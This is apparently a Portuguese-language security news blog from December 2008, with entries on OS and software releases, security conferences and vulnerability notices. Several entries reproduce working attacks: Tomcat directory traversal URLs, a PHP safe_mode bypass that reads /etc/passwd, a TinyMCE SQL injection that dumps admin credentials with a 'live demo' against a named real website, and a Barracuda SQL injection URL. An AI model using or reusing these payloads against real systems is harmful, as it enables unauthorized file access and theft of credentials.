MikeOS 3.0 Released

December 23rd, 2008

Nova versão do sistema operacional MikeOS acaba de ser lançada.

BSD-like License
- http://mikeos.berlios.de/LICENSE.TXT

Download
- http://prdownload.berlios.de/mikeos/mikeos-3.0.zip

MorphOS 2.2 Released

December 23rd, 2008

http://morphos-team.net/top_navbar.gif

Nova versão do sistema operacional Morphos acaba de ser lançada.

Screenshot

É aconselhável visualizar a lista de compatibilidade de hardware antes de fazer a instalação do OS.

Download
- Mirror-1
- Mirror-2

Instalação
- http://morphos-team.net/installation.html

LayerOne 2009 Security Conference - Call For Papers

December 23rd, 2008

From: InfoSec News

Conferência de segurança que acontece na Califórnia abordará não somente softwares mas também a segurança em hardwares como GSM, Proximity Cards e Access Control Systems.

Assuntos Abordados
- Virtualization
- Forensics / Anti-Forensics Techniques
- Hardware Hacking (GSM, Proximity Cards, Access Control Systems)
- Law / Legal Issues
- Malware
- VoIP
- Cryptographic Cracking Using FPGA Technology

Maiores Informações
- http://layerone.info/

CONFidence 2009, CFP

December 23rd, 2008

From: Andrzej Targosz


http://2009.confidence.org.pl/

Attention!

Vai começar a 5 edição da melhor conferência internacional de segurança da Polônia.

Assuntos Abordados
# 3G/4G, SS7, WLAN, RFID, Bluetooth Security
# Analysis and reverse engineering of malicious code
# Analysis of vulnerability, attacks and defence against networks, hardware, software
# Virtualization and operating systems security
# Data recovery, Forensic and Incident Response
# Physical security
# Firewall technologies
# Web applications security and cryptographic

Maiores Informações
- http://2009.confidence.org.pl/

Novell Identity Manager Cross-Site Scripting

December 23rd, 2008


http://www.novell.com/products/identitymanager/index.html

O produto da Novell Identity Manager apresenta vulnerabilidades que permitem a execução de códigos maliciosos.

Maiores informações
- http://secunia.com/advisories/product/11946/
- http://support.novell.com/docs/Readmes/InfoDocument/patchbuilder/readme_5040000.html
- http://support.novell.com/docs/Readmes/InfoDocument/patchbuilder/readme_5040020.html
- http://support.novell.com/docs/Readmes/InfoDocument/patchbuilder/readme_5040040.html
- http://support.novell.com/docs/Readmes/InfoDocument/patchbuilder/readme_5040041.html
- http://support.novell.com/docs/Readmes/InfoDocument/patchbuilder/readme_5040042.html

Patch
- http://download.novell.com/patch/finder/

VirtualBox 2.1 Released

December 23rd, 2008

Nova versão do VirtualBox da SUN acaba de ser lançada.

O VirtualBox funciona em quase todos os sistemas operacionais como o Solaris, Linux, OpenSolaris, MacOSX, Windows(NT 4.0, 2000, XP, Server 2003, Vista), DOS/Windows 3.x e OpenBSD.

Muitas correções e novas funcionalidades foram feitas nessa nova release.

Changelog:
- http://www.virtualbox.org/wiki/Changelog

Download:
- http://www.virtualbox.org/wiki/Downloads
- VirtualBox 2.1.0 for Windows hosts x86 | AMD64 (somente no Windows x64!)
- VirtualBox 2.1.0 for OS X hosts Intel Macs
- VirtualBox 2.1.0 para Linux hosts
- VirtualBox 2.1.0 para Solaris e OpenSolaris hosts x86 | AMD64
- VirtualBox 2.1.0 Software Developer Kit (SDK) Todas plataformas

Debian GNU/Linux 4.0_6 Released

December 18th, 2008

Nova versão do sistema operacional Linux Debian acaba de sair do forno.

Vulnerabilidades corrigidas e novas funcionalidades foram adicionadas nessa nova release. Todos os administradores linux que utilizam a distribuição Debian DEVEM atualizar seus sistemas operacionais.

~# apt-get update
~# apt-get upgrade

Download:
- http://www.debian.org/mirror/list

Maiores informações:
- http://www.debian.org/News/2008/20081218

OpenSuse 11.1 Released

December 18th, 2008

Nova versão do sistema operacional Linux OpenSuse acaba de sair do forno com mais de 230 novas características e nova lincença.

- http://en.opensuse.org/Testing:Features_11.1
- http://en.opensuse.org/EULA

Download:
X86
- http://download.opensuse.org/distribution/11.1/iso/openSUSE-11.1-KDE4-LiveCD-i586.iso
- http://download.opensuse.org/distribution/11.1/iso/openSUSE-11.1-GNOME-LiveCD-i586.iso
- http://download.opensuse.org/distribution/11.1/iso/openSUSE-11.1-NET-i586.iso
- http://download.opensuse.org/distribution/11.1/iso/openSUSE-11.1-DVD-i586.iso
- http://download.opensuse.org/distribution/11.1/iso/torrent/openSUSE-11.1-KDE4-LiveCD-i686.torrent
- http://download.opensuse.org/distribution/11.1/iso/torrent/openSUSE-11.1-GNOME-LiveCD-i686.torrent
- http://download.opensuse.org/distribution/11.1/iso/torrent/openSUSE-11.1-DVD-i686.torrent

X86-64
- http://download.opensuse.org/distribution/11.1/iso/openSUSE-11.1-KDE4-LiveCD-x86_64.iso
- http://download.opensuse.org/distribution/11.1/iso/openSUSE-11.1-GNOME-LiveCD-x86_64.iso
- http://download.opensuse.org/distribution/11.1/iso/openSUSE-11.1-DVD-x86_64.iso
- http://download.opensuse.org/distribution/11.1/iso/openSUSE-11.1-NET-x86_64.iso

Maiores informações:
- http://www.opensuse.org
- http://software.opensuse.org/

Apache Tomcat UTF-8 Directory Traversal

December 18th, 2008

Vulnerabilidade no servidor web Tomcat possibilita acessar arquivos do sistema remotamente.

CVE:
- CVE-2008-2938

Exploit:
- http://www.example.com/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/foo/bar
- http://www.example.com/contextpath/%c0%ae%c0%ae/WEB-INF/web.xml
- http://www.securityfocus.com/data/vulnerabilities/exploits/30633.py

Maiores informações:
- http://tomcat.apache.org/security.html
- http://tomcat.apache.org/security-6.html
- http://tomcat.apache.org/
- http://www.securityfocus.com/archive/1/495318
- http://www.kb.cert.org/vuls/id/343355

Microsoft Word Vulnerável

December 18th, 2008

Vulnerabilidade no Microsoft Word permite execução de códigos arbitrários na máquina do usuário.

Maiores informações:
- http://www.zerodayinitiative.com/advisories/ZDI-08-086/
- http://www.microsoft.com/office/

Microsoft SQL Server ’sp_replwritetovarbin’

December 18th, 2008

Vulnerabilidade encontrada no banco de dados da Microsoft MSSQL Server possibilita execução de códigos arbitrários.

Exploits:
- http://www.securityfocus.com/data/vulnerabilities/exploits/32710.sql
- http://www.securityfocus.com/data/vulnerabilities/exploits/32710.html

Maiores informações:
- http://www.sec-consult.com/files/20081209_mssql-2000-sp_replwritetovarbin_memwrite.txt
- http://www.microsoft.com/sql/default.mspx

SQLMap 0.6.3 Released - Automatic SQL Injection Tool

December 18th, 2008

Nova versão da ferramenta SQLMAP (SQLMap foi desenvolvida em PYTHON) para automatizar SQLInjetions em sistemas web released.
Múltiplos bugs foram corrigidos e novas funções implementadas.

Desenvolvida por:
- Bernardo Damele
- Daniele Bellucci

Download:
- http://sqlmap.sourceforge.net
- http://packetstorm.codar.com.br/UNIX/audit/sqlmap-0.6.3.tar.gz

Mozilla Firefox/Thunderbird/SeaMonkey Vulneráveis

December 18th, 2008

De acordo com a Mozilla Foundation múltiplas vulnerabilidades críticas foram encontradas nos seus produtos como a possibilidade de conseguir remotamente acesso às credenciais (usuário/senha) de sites, possibilidade de denial-of-service e execução de códigos arbitrários na máquina dos usuários. Para isso, basta explorar as vulnerabilidades encontradas nos navegadores e leitor de email (Firefox, ThunderBird e SeaMonkey) e inserir códigos maliciosos em seus sites e emails podendo assim instalar e executar programas remotamente como trojans, rootkits, vírus e etc…


Common Vulnerabilities and Exposures (CVE)
- CVE-2008-5500
- CVE-2008-5501
- CVE-2008-5503
- CVE-2008-5504
- CVE-2008-5505
- CVE-2008-5506
- CVE-2008-5507
- CVE-2008-5508
- CVE-2008-5510
- CVE-2008-5511
- CVE-2008-5512
- CVE-2008-5513
- CVE-2008-5502

Sites dos Projetos Mozilla:
- http://www.seamonkey-project.org/
- http://www.mozilla.com/firefox/
- http://www.mozilla.com/thunderbird/

Stable kernel 2.6.27.10 Released

December 18th, 2008

Nova versão do Kernel acaba de sair do forno.

Recomendável atualização do Kernel para correção sérias de vulnerabilidades.

Download:
- http://www.kernel.org/pub/linux/kernel/v2.6/linux-2.6.27.10.tar.bz2

Extensão Python safe_mode bypass

December 18th, 2008

From:

< ?php
/*
php_python_bypass.php
php python extension safe_mode bypass
Amir Salmani - amir[at]salmani[dot]ir
*/

//python ext. installed?
if (!extension_loaded('python')) die("python extension is not installed\n");

//eval python code
$res = python_eval('
import os
pwd = os.getcwd()
print pwd
os.system('cat /etc/passwd')
');

//show result
echo $res;
?>

Braço robótico tem código aberto baseado em Linux

December 18th, 2008

Fonte: Inovação Tecnológica

A empresa suíça Neuronics lançou um novo braço robótico de baixo custo e alto desempenho, voltado para uso na indústria, na automação de laboratórios e em pesquisas. A grande novidade é que seus programas de controle são totalmente abertos, baseados no sistema operacional Linux.

Linux incorporado

O Katana é controlado por uma única placa-mãe que roda um Linux incorporado (embedded Linux system). Além do processador MPC5200, a placa-mãe contém seis controladores de 32 bits para os motores do braço robótico (TI TMS320).

O controle e programação do Katana podem ser feitos por um meio de um console Linux padrão ou através de uma interface Web amigável, baseada em Ajax. O robô possui ainda servidor SOAP, interface XML-RPC e interface CAN.

A empresa também disponibiliza todas as APIs para controle de todos os recursos de alto e de baixo nível do Katana.

Robô para escolas

Os braços robóticos convencionais são baseados em sistemas de controle e protocolos proprietários, o que dificulta seu uso em pesquisas, inclusive na customização interna para o controle de processos específicos, que poderia ser feita nas próprias empresas.

Um braço robótico de sistema aberto é a solução ideal também para o ensino de robótica. As instituições educacionais hoje têm que escolher entre equipamentos proprietários de altíssimo custo ou braços robóticos mais parecidos com brinquedos, sem possibilidades de aplicação real.

O preço proposto para o Katana é US$25.000,00.

Microsoft Security Bulletin MS08-078 - Critical

December 18th, 2008

Security Update for Internet Explorer (960714)

Microsoft corrige bug no Internet Explorer que permite execução de softwares maliciosos remotamente sem o consentimento do usuário.

Atualização:
- http://update.microsoft.com/microsoftupdate/

Maiores informações:
- http://www.microsoft.com/technet/security/bulletin/ms08-078.mspx?pubDate=2008-12-17

TinyMCE Remote SQL Injection

December 18th, 2008

************************************************************
** TinyMCE Remote SQL Injection
************************************************************
** Prodcut: TinyMCE Version 2.0.1
** Home : http://tinymce.moxiecode.com
** Vunlerability : 2/ SQL Injection
** Risk : high !!
** Dork : N/A
************************************************************
** Discovred by: AnGeL25dZ
** From : Constantine - Algeria
** Contact : angel25dz@gmail.com
** *********************************************************
** Greetz to : ALLAH
** All Members of HackTeachTeam http://www.hackteach.org/
** Ra3ch, His0k4
************************************************************
** Remote SQL Injection vulnerability
**
** Exploit :index.php?menuID=-1 union select 0,Group_CONCAT(loginnaam,CHAR(32,58,32),wachtwoord),2,3 from adminusers
**
** Use : http://[path]/Exploit
** Admin : http://[path]/cms/login.php
****************************************************************
** Live demo : http://www.uitgeverijginkgo.nl/index.php?menuID=-1 union select 0,Group_CONCAT(loginnaam,CHAR(32,58,32),wachtwoord),2,3 from adminusers
**
****************************************************************

# milw0rm.com [2008-12-17]

Barracuda Spam Firewall (Firmware v3.5.11.020, Modelo 600)

December 17th, 2008

Barracuda Networks Spam Firewall está vulnerável a ataques do tipo SQLInjections.

Advisory:
- http://dcsl.ul.ie/advisories/02.htm

Barracuda Networks Technical Alert
- http://www.barracudanetworks.com/ns/support/tech_alert.php

Xpl”:
http://WWW.BARRACUDANETWORKS.COM/cgi-bin/index.cgi?&user=&password=&et=&auth_type=Local&locale=en_US&realm=&primary_tab=USERS&secondary_tab=per_user_account_view&boolean_0=boolean_and&filter_0=search_count_equals&pattern_0=if(database() like concat(char(99),char(37)),5,0)

Spams Reportados ao CERT.br — Novembro de 2008

December 16th, 2008
<br />


Legenda:

* SpamCop:
o Spamvertised (notificações de spamvertised website): reclamações sobre máquinas que hospedam páginas com produtos e serviços sendo oferecidos no spam.
o Proxy aberto: reclamações sobre máquinas com serviço de proxy mal configurado, sendo abusadas.
o Relay aberto: reclamações sobre máquinas com serviço de email mal configurado, sendo abusadas.
o Envio de spam: reclamações de máquinas enviando spam.
o Outras: reclamações enviadas pelo SpamCop, mas que não se enquadram nos tipos anteriores.
* Outras fontes: reclamações enviadas por fontes diferentes do SpamCop.